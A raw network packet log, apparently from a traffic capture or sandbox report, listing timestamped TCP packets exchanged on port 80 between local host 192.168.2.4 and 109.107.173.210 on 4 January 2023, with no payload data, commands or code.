Jan 4, 2023 16:47:23.882204056 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882205009 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882229090 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882229090 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882252932 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882256985 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882277966 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882285118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882301092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882304907 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882324934 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882328987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882349968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882358074 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882364035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882391930 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882410049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882534981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882560015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882584095 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882606030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882611036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882630110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882651091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882653952 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882683992 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882684946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882719040 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882747889 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882750034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882764101 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882776022 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882785082 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882786989 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882807970 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882819891 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882827997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882833004 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882847071 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882858038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882870913 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882870913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882898092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882900000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882946968 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882947922 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882977009 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882992029 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883023024 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.883032084 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883054018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.883074999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883095026 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.883131027 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883171082 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883174896 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.883200884 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883207083 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.883229017 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883245945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.883260012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883290052 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883292913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.883317947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883344889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883346081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.883377075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883393049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.883404970 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883435965 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883445024 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.883466005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883492947 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.883495092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883524895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883524895 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.883555889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883574963 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.883575916 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.883620024 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.883667946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.889365911 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.889408112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.889436960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.889516115 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.889545918 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.889552116 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.889575958 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.889605999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.889640093 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.889642954 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.889669895 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.889673948 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.889703035 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.889717102 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.889744997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.889774084 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.907881021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.907944918 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.907989979 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908025980 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908071995 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908094883 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908118010 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908149004 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908165932 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908179045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908211946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908221960 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908258915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908265114 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908308029 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908308029 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908355951 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908365011 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908401012 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908404112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908452034 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908452988 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908500910 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908500910 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908548117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908551931 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908597946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908597946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908644915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908654928 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908691883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908691883 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908740044 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908741951 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908786058 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908787012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908834934 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908835888 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908890009 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908907890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908957958 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.908970118 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.908989906 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909029007 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909040928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909054995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909087896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909123898 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909146070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909147024 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909164906 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909209013 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909213066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909231901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909260035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909279108 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909307957 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909312963 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909354925 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909359932 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909401894 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909403086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909451008 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909452915 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909498930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909504890 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909547091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909550905 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909598112 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909605980 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909660101 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909666061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909710884 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909729004 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909755945 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909781933 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909801006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909811020 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909847021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909853935 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909898043 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909907103 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909955025 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.909962893 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.909998894 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910011053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910044909 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910054922 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910098076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910109043 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910120964 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910166979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910181999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910186052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910202026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910231113 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910253048 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910262108 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910305977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910307884 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910350084 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910375118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910394907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910415888 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910430908 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910440922 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910476923 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910480976 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910521030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910531998 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910567045 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910573006 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910613060 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910633087 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910656929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910670996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910720110 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910732985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910779953 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910792112 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910825014 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910830975 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910867929 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910868883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910916090 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910923004 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910948038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910968065 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.910993099 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.910995960 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911036968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911041021 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911082983 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911084890 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911128998 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911128998 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911174059 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911179066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911221027 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911223888 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911267042 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911268950 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911310911 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911314964 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911355972 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911372900 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911401033 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911402941 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911447048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911458015 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911493063 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911525011 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911537886 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911554098 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911583900 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911597967 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911637068 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911642075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911659002 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911703110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911712885 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911741972 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911747932 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911792994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911837101 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911880016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911881924 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911881924 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911926985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.911971092 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911971092 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911971092 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.911988020 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.912004948 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.912017107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.912029982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.912058115 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.912101984 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.915674925 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.915718079 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.915756941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.915796041 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.915807962 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.915836096 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.915859938 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.915877104 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.915891886 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.915918112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.915941954 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.915958881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.915978909 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.915998936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.916018963 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.916038990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.916054964 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.916101933 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938061953 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938139915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938188076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938235044 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938265085 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938281059 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938297987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938327074 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938355923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938375950 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938393116 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938421965 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938426018 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938471079 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938476086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938520908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938523054 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938565016 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938570976 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938616991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938621044 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938663960 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938663960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938724995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938750982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938798904 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938803911 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938847065 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938849926 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938895941 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938896894 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938941956 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938950062 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.938992977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.938997030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939040899 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939044952 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939090967 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939091921 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939136028 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939141035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939182997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939189911 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939234018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939237118 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939280987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939285040 CET	80	49695	109.107.173.210	192.168.2.4
